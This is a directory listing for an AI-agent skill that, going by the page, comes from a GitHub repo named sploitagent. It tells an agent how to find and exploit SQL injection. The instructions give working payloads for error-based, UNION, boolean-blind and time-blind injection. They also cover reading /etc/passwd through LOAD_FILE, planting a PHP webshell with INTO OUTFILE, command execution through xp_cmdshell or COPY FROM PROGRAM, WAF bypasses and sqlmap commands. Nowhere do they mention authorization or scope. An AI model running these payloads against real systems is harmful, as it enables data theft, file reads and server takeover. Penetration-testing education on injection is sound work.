SQL Injection (SQLi)
SkillSearchDetect and exploit SQL injection (error-based, UNION, boolean/time blind, stacked). Load when a param feeds a query, you see DB errors, numeric/string params change result sets, login forms, search, sort/order-by, or ORM raw queries. Signals: "id=", 500 on a quote, "You have an error in your SQL syntax", MySQL/Postgres/MSSQL/Oracle banners.
Instructions available. Your AI can read the instructions. Execution depends on the setup they require.
Account requirements not reviewed. Check the skill instructions before use; ahel provides instructions and does not run this skill.
Add ahel to your AI once: Claude, ChatGPT, Cursor, Claude Code or Codex. Then ask it to use this.
Then ask your AI: use the SQL Injection (SQLi) skill
What this skill tells your AI
The instructions your AI receives, as published by noorqureshi/sploitagent in skills/web/web-sqli/SKILL.md and read by ahel’s review.
When it applies
User input is concatenated into a SQL query. Test every param, header (X-Forwarded-For,
User-Agent, Referer sometimes logged into DB), cookie, and JSON field — not just ?id=.
Why it works
The query string mixes code and data. A stray quote/operator lets you close the intended literal and append your own SQL, which the engine parses as instructions. Blind variants leak data one bit at a time via truthy/falsy responses or timing.
Method
Exact per-DB payloads, blind/error/time variants, and WAF bypasses: see
cheatsheet.mdnext to this file. Work the whole variation set for a parameter before concluding it isn't injectable — one failed quote is not a clean param.
- Detect — send
',",), then a self-true vs self-false pair:id=1 AND 1=1vsid=1 AND 1=2(numeric);x' AND '1'='1vsx' AND '1'='2(string). Different responses = injectable. Error text = fast win; identical = try blind/time. - Fingerprint the DB (comment style, string concat, version fn) then pick a technique:
- UNION: find column count (
ORDER BY nuntil error), find a string-typed column, thenUNION SELECT NULL,version(),NULL-- -and pullinformation_schema. - Boolean-blind:
AND SUBSTRING((SELECT ...),1,1)='a'— automate the oracle. - Time-blind:
AND SLEEP(5)/pg_sleep(5)/WAITFOR DELAY '0:0:5'when no visible diff.
- UNION: find column count (
- Escalate beyond data where the DB privileges allow:
- File read (MySQL
FILEpriv):UNION SELECT LOAD_FILE('/etc/passwd')— read app source, keys, config to find the next bug. - File write → webshell:
... INTO OUTFILE '/var/www/html/s.php'(needsFILE, a writable path, andsecure_file_privunset). MSSQLxp_cmdshell/ PostgresCOPY ... FROM PROGRAMgive direct command execution when you're DBA.
- File read (MySQL
- Automate once confirmed:
sqlmap -r req.txt --batch --level 3 --risk 2 --dbms=mysql(-r= saved Burp request preserves auth/headers; raise level/risk only after manual proof).
Gotchas
- WAF blocks
union select→ try inline commentsun/**/ion, case, orsqlmap --tamper. - Numeric context needs no quotes; quoting it makes a real vuln look dead.
sqlmapon the raw URL misses auth/CSRF — always feed it a captured request (-r).- Second-order: input stored now, executed in a later query elsewhere — test the read path.
Verify success
Extract a harmless proof: @@version, current_user, database(), or one row from a
non-sensitive table. For a report, show the version string, not customer data.
References
PortSwigger SQLi labs; sqlmap wiki; OWASP SQLi Prevention Cheat Sheet.
Signals
- GitHub stars
- 20
- Forks
- 7
- Last commit
- Sep 2026
Advanced
- Item type
- skill
- Key
web-sqli-noorqureshi- Source
- github.com/noorqureshi/sploitagent
github.com/noorqureshi/sploitagent
Related picks
Skill · michtio
The pick for PHPfeature-flags-php
Skill · posthog
The pick for PHPsupabase-postgres-best-practices
Skill · asymmetric-al
The pick for Postgresgolem-add-mysql-ts
Skill · golemcloud
The pick for MySQLapi-database-mysql
Skill · agents-inc
The pick for MySQLowasp-security
Skill · davila7
The pick for Web (OWASP)